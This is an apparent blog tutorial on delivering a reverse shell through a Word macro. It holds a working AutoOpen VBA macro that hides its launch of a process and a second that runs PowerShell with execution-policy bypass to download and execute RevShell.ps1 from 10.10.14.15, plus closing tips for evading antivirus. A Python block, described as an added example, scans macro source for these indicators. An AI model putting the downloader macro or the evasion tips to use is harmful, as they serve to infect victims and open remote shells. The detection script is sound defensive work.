Delivering a reverse shell payload via an Office macro is an old technique, but it still works if you can bypass AV.
Get your code ready
Start Microsoft Office 2016 Pro Plus, go to the View tab and click Macros > View Macros.
Give the macro a name, select Document1 under "Macros in", and click Create.
Paste the code below and save the file as a Word Macro-Enabled Document or Word 97-2003 Document.
```vb
Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "calc.exe"
exec = Shell(cmd, vbHide)
End Sub
Sub AutoOpen()
TestMacro
End Sub
```
Execute
Open the document and click Enable Content, and calc.exe opens.
Simple Downloader
In this way we can execute any command, such as powershell iwr …:
```vb
Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "powershell.exe -exec bypass -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/RevShell.ps1')"
exec = Shell(cmd, vbHide)
End Sub
Sub AutoOpen()
TestMacro
End Sub
```
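Both macros above share a shape that is easy to spot from the defender's side: an auto-run entry point (AutoOpen) that hands a command string to Shell. The Python code below is an added example, not part of the original post, that triages extracted VBA source for that shape; the rule names, the severity levels and the `triage` function are assumptions of this example, and the sample input is the downloader macro from this page.

```python
import re

# Constructed input: the downloader macro shown above, as plain VBA source text.
SAMPLE_MACRO = """Sub TestMacro()
' TestMacro Macro
cmd = "powershell.exe -exec bypass -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/RevShell.ps1')"
exec = Shell(cmd, vbHide)
End Sub
Sub AutoOpen()
TestMacro
End Sub
"""

# Heuristic indicators; the rule names are made up for this example.
RULES = {
    "auto_exec": re.compile(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b",
        re.I | re.M),
    "process_launch": re.compile(r"\b(?:Shell\s*\(|WScript\.Shell)", re.I),
    "hidden_window": re.compile(r"\bvbHide\b", re.I),
    "powershell": re.compile(r"\bpowershell\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I),
    "download": re.compile(r"downloadstring|downloadfile|\biwr\b|invoke-webrequest", re.I),
}
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def triage(source):
    """Return verdict, matched indicator names and URLs for one macro module."""
    # Drop full-line comments so text in a comment does not trigger a rule.
    code = "\n".join(line for line in source.splitlines()
                     if not line.lstrip().lower().startswith(("'", "rem ")))
    hits = sorted(name for name, rx in RULES.items() if rx.search(code))
    # A macro that runs on open and starts a process is what the page builds.
    launches = "auto_exec" in hits and "process_launch" in hits
    if launches and ("powershell" in hits or "download" in hits):
        verdict = "high"
    elif launches:
        verdict = "medium"
    else:
        verdict = "low"
    return {"verdict": verdict, "indicators": hits, "urls": URL.findall(code)}


if __name__ == "__main__":
    print(triage(SAMPLE_MACRO))
```

Macro source can be pulled out of a document with a tool such as olevba before it is passed to `triage`.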
Tips to bypass AV
- Encode/encrypt the PowerShell command
- Unhook powershell.exe